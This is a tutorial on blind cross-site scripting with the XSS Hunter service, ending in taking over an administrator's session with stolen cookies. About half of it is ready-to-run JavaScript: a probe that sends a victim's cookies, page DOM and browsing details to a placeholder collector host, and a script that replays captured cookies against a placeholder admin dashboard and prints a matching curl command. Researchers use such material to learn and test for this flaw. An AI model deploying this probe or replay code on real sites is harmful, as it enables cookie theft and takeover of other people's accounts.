Blind XSS using XSS Hunter

What is XSS Hunter?

XSS Hunter is a free service provided by @IAmMandatory that makes it easier for researchers to find blind XSS: injections whose output is rendered on pages the researcher never gets to see. It works by hosting a JavaScript probe on your own subdomain. When a payload that loads that probe fires in someone's browser, the probe collects details about the page it landed on (the user's IP address, the cookies visible to JavaScript, the URL and title of the vulnerable page, the referrer and user agent, a copy of the DOM) and takes a screenshot of the page, then sends all of it back to your XSS Hunter account.


How to make payload in XSS Hunter?

You only need to create an account at xsshunter.com. During signup you are asked to pick a subdomain under xss.ht; that subdomain is where your payloads will load the probe script from.

Once you have an account and a subdomain, open the Payloads page. It lists ready-made payloads, all already pointing at your subdomain, such as:

  1. <script> Tag Payload - basic XSS payload
  2. javascript: URI Payload - for use where URIs are taken as input
  3. <input> Tag Payload - for bypassing poorly designed blacklists, using the HTML5 autofocus attribute so the handler fires without user interaction
  4. <img> Tag Payload - another basic payload for when <script> tags are explicitly filtered
  5. <video><source> Tag Payload - HTML5 payload; only works in Firefox, Chrome and Opera
  6. <iframe srcdoc= Tag Payload - HTML5 payload; only works in Firefox, Chrome and Opera
  7. XMLHttpRequest Payload - for exploiting applications whose Content Security Policy has a script-src directive but still allows 'unsafe-inline'
  8. $.getScript() Payload - example payload for sites that include jQuery

Which XSS cases suit XSS Hunter

XSS Hunter is most useful when the injected input is rendered on a page the researcher cannot reach, such as an admin dashboard.

For example, take a "contact us" form with name, email and message fields. Whatever is submitted is stored and later displayed to an administrator in the admin dashboard. If we only send a payload that calls alert(), we have no way of knowing whether it ever executed, because the page where it would execute is not ours to open.

With XSS Hunter we do know. If the payload runs in the administrator's browser (the application is vulnerable), the probe reports back to our XSS Hunter account, and we also receive a notification by email. The report itself tells us where it fired, which is exactly the information a blind injection otherwise hides.
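To make concrete what the hosted script does when it fires, here is an added example written for this article; it is not XSS Hunter's own probe code. It collects the same kinds of fields described above and sends them to a collector. The collector URL https://collector.example/report is a placeholder, and the probe is written against a window-like object so the collection logic can be exercised outside a browser with a constructed fake window.

```javascript
// Added example (not XSS Hunter's own probe): a minimal blind-XSS probe that does
// what the script hosted on your xss.ht subdomain does once it runs in the victim's browser.
const COLLECTOR_URL = "https://collector.example/report"; // placeholder, not a real collector

// Build the report from a window-like object (window in a browser, a fake object in tests).
function collectReport(win, maxDomBytes = 64 * 1024) {
  const doc = win.document;
  const html = doc.documentElement ? doc.documentElement.outerHTML : "";
  return {
    url: win.location.href,            // where the payload fired (e.g. the admin dashboard)
    origin: win.location.origin,
    referrer: doc.referrer || "",
    cookies: doc.cookie || "",         // only cookies WITHOUT the HttpOnly flag show up here
    userAgent: win.navigator.userAgent,
    title: doc.title || "",
    dom: html.slice(0, maxDomBytes),   // truncated DOM snapshot
    firedAt: new Date().toISOString(),
  };
}

// Fallback channel: a GET via an image request. Survives a missing fetch() and a CSP that
// blocks connect-src but not img-src; limited by URL length, so the body is truncated.
function sendViaImage(body, collectorUrl, win) {
  const img = new win.Image();
  img.src = collectorUrl + "?r=" + encodeURIComponent(body).slice(0, 8000);
  return "image";
}

// Primary channel: a no-cors POST. The response is opaque, but the request is still sent,
// so the collector needs no CORS headers. text/plain keeps it a CORS "simple" request.
// Returns which channel was used; the fetch promise itself is not awaited (fire and forget).
function sendReport(report, collectorUrl = COLLECTOR_URL, win = globalThis) {
  const body = JSON.stringify(report);
  if (typeof win.fetch === "function") {
    win.fetch(collectorUrl, {
      method: "POST",
      mode: "no-cors",
      keepalive: true,                 // let the request finish even if the page navigates away
      headers: { "Content-Type": "text/plain" },
      body,
    }).catch(() => sendViaImage(body, collectorUrl, win));
    return "fetch";
  }
  return sendViaImage(body, collectorUrl, win);
}

// In a real browser the probe fires as soon as the script is loaded by the injected tag.
if (typeof window !== "undefined" && window.document) {
  sendReport(collectReport(window));
}
```

The injected payload would be a tag such as `<script src="https://yoursubdomain.xss.ht"></script>` (subdomain name assumed) whose response body is this script. Two things worth knowing before reading a report: cookies flagged HttpOnly never appear in document.cookie, so a report may show the admin page's URL and DOM but no session cookie; and if the page sets a Content Security Policy, the script tag itself must be allowed by script-src for any of this to run, which is what the XMLHttpRequest payload in the list above is for.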




Cookie Theft and Login to Admin account

As explained earlier, the report gives us sensitive information from the user whose browser ran the payload, including their cookies.

If those cookies contain a session identifier or user token, we can reuse them to enter the admin dashboard without ever logging in with a username and password. Note that this only works for cookies the browser exposes to JavaScript: a session cookie set with the HttpOnly flag never appears in document.cookie, so it will be missing from the report even though the payload fired.

Open the vulnerable application in your own browser, replace your cookies with the admin's captured cookies, then browse to the admin dashboard page.

To swap in the admin's cookies you can intercept the request in Burp Suite and edit the Cookie header, or install a cookie editor add-on in the browser you are using.
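As an added example (not from the article), here is the same replay done from a script rather than by hand: it turns the cookie string a blind-XSS probe captured into a Cookie header on a request of our own, and prints the equivalent curl command for use from the shell. The target https://app.example/admin and the captured cookie value are constructed placeholders, and the session-cookie name pattern is a heuristic of this example, not a standard.

```javascript
// Added example (not from the article): replaying captured admin cookies against the dashboard.
const TARGET = "https://app.example/admin";                                  // placeholder target
const CAPTURED_COOKIES = "PHPSESSID=abc123; theme=dark; _ga=GA1.2.111";      // constructed sample capture

// document.cookie yields "name=value; name2=value2". Parse it into an object, keeping order.
function parseCapturedCookies(cookieString) {
  const cookies = {};
  for (const part of cookieString.split(";")) {
    const trimmed = part.trim();
    if (!trimmed) continue;
    const eq = trimmed.indexOf("=");
    if (eq === -1) continue;                 // malformed fragment, skip it
    cookies[trimmed.slice(0, eq)] = trimmed.slice(eq + 1); // value may itself contain '='
  }
  return cookies;
}

// Heuristic (an assumption of this example): cookie names that usually carry a session.
// If nothing matches, the real session cookie was most likely HttpOnly and never reached
// document.cookie, so replaying what was captured will not log you in.
const SESSION_NAME_PATTERN = /sess|sid|token|auth|login/i;
function findSessionCookies(cookies) {
  return Object.keys(cookies).filter((name) => SESSION_NAME_PATTERN.test(name));
}

// Build the replay request. Analytics cookies are dropped: they are not needed for the
// session and only add noise to the target's logs.
function buildReplayRequest(targetUrl, cookieString, { drop = [/^_ga/, /^_gid/] } = {}) {
  const cookies = parseCapturedCookies(cookieString);
  const kept = Object.entries(cookies).filter(([name]) => !drop.some((re) => re.test(name)));
  return {
    method: "GET",
    url: targetUrl,
    headers: { Cookie: kept.map(([n, v]) => `${n}=${v}`).join("; ") },
    sessionCookies: findSessionCookies(Object.fromEntries(kept)),
  };
}

// The same request as a curl command (cookie values containing single quotes would need escaping).
function toCurl(req) {
  return `curl -sS -X ${req.method} -H 'Cookie: ${req.headers.Cookie}' '${req.url}'`;
}

// Send it with Node's global fetch (Node 18+). redirect: "manual" so a 3xx to the login page
// is visible: that means the session was not accepted (expired, bound to the admin's IP, or
// the captured cookie was never the session cookie at all).
async function replay(req) {
  const res = await fetch(req.url, { method: req.method, headers: req.headers, redirect: "manual" });
  return { status: res.status, location: res.headers.get("location") };
}

if (typeof require !== "undefined" && require.main === module) {
  const req = buildReplayRequest(TARGET, CAPTURED_COOKIES);
  if (req.sessionCookies.length === 0) {
    console.error("no session-looking cookie captured; it is probably HttpOnly, act through the victim's browser instead");
  }
  console.log(toCurl(req));
  if (process.env.REPLAY === "1") replay(req).then(console.log).catch(console.error); // only send on request
}
```

Run it directly to get the curl command; set REPLAY=1 to actually send the request. Whether you replay by hand in Burp Suite, with a cookie editor, or with a script like this, check the response for a redirect to the login page before concluding the cookie is dead: some applications bind sessions to the client IP or user agent, and a captured session may only work when those match.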



That is enough on XSS Hunter for this article. If anything is still unclear, you can contact us via the "Contact Us" page.